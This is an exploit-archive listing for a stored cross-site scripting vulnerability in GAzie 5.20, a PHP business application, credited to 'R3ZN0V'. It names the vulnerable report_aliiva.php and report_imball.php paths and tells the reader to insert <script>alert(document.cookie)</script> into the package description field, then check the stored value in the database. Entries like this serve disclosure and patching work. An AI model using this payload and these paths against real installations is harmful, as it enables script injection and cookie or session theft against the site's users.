GAzie <= 5.20 Cross Site Scripting Vulnerability

2012-11-12T00:00:00
ID 1337DAY-ID-19716
Type zdt
Reporter R3ZN0V
Modified 2012-11-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: [Stored Cross Site Scripting]
# Risk : Very High
# Date: [2/6/2012]
# Author: [R3ZN0V]
# Email : [email protected]
# Software Link: http://sourceforge.net/projects/gazie/files/gazie/gazie5.20/gazie5.20.zip/download
# Version: [5.20]

[*] The Exploit [*]

" http://localhost/[script]/modules/config/report_aliiva.php?field=2&auxil=1&flag_order=&limit=0 [Xss Code]
" http://localhost/[script]/modules/config/report_imball.php "

[*] Descriptions for the Vulnerability [*]

In this link you can add a new package 'Insert new package type' ,, in the description field put your code 'just 50 characters '
then click insert ,, and try insert this code :

<script>alert(document.cookie)</script>

Go to the database exactly where the (gaz_001imball) excist in your database and browse the distinct value for the (descri)
and see the result .

Greatz To : Allah.

#  0day.today [2018-04-09]  #